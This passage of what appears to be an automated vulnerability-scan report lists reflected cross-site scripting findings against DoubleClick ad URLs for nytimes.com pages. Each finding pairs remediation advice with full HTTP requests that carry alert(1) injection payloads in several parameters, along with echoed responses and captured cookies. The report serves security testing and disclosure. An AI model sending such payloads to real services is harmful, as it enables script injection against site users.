This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto1c8cb"-alert(1)-"c06727afda5&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
8/3b05/7/128/%2a/d%3B240674684%3B0-0%3B0%3B63131103%3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto1c8cb"-alert(1)-"c06727afda5&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be
...[SNIP]...

4.54. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a918'-alert(1)-'8a98d61d702 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x908a918'-alert(1)-'8a98d61d702&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
19%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x908a918'-alert(1)-'8a98d61d702&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?d
...[SNIP]...

4.55. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3335a"-alert(1)-"d20d01cfbe4 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x903335a"-alert(1)-"d20d01cfbe4&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
19%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x903335a"-alert(1)-"d20d01cfbe4&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?d
...[SNIP]...

4.56. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 421d5"-alert(1)-"075af53bbdf was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2421d5"-alert(1)-"075af53bbdf&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2421d5"-alert(1)-"075af53bbdf&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvent
...[SNIP]...

4.57. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74793'-alert(1)-'ea56e5f634 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt274793'-alert(1)-'ea56e5f634&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6725

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt274793'-alert(1)-'ea56e5f634&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvent
...[SNIP]...

4.58. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3039'-alert(1)-'e3d745f63fd was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=a3039'-alert(1)-'e3d745f63fd HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=a3039'-alert(1)-'e3d745f63fdhttp://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.59. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0dd0"-alert(1)-"368571c22a3 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=a0dd0"-alert(1)-"368571c22a3 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=a0dd0"-alert(1)-"368571c22a3http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

4.60. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89feb'-alert(1)-'01cc9048b49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=&89feb'-alert(1)-'01cc9048b49=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6741

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=&89feb'-alert(1)-'01cc9048b49=1http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.61. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48d43"-alert(1)-"5168faf1b2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=&48d43"-alert(1)-"5168faf1b2a=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6741

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=&48d43"-alert(1)-"5168faf1b2a=1http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

4.62. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 996c3"-alert(1)-"92317d430a2 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook996c3"-alert(1)-"92317d430a2&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
0%3B0%3B63131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook996c3"-alert(1)-"92317d430a2&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/commu
...[SNIP]...

4.63. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

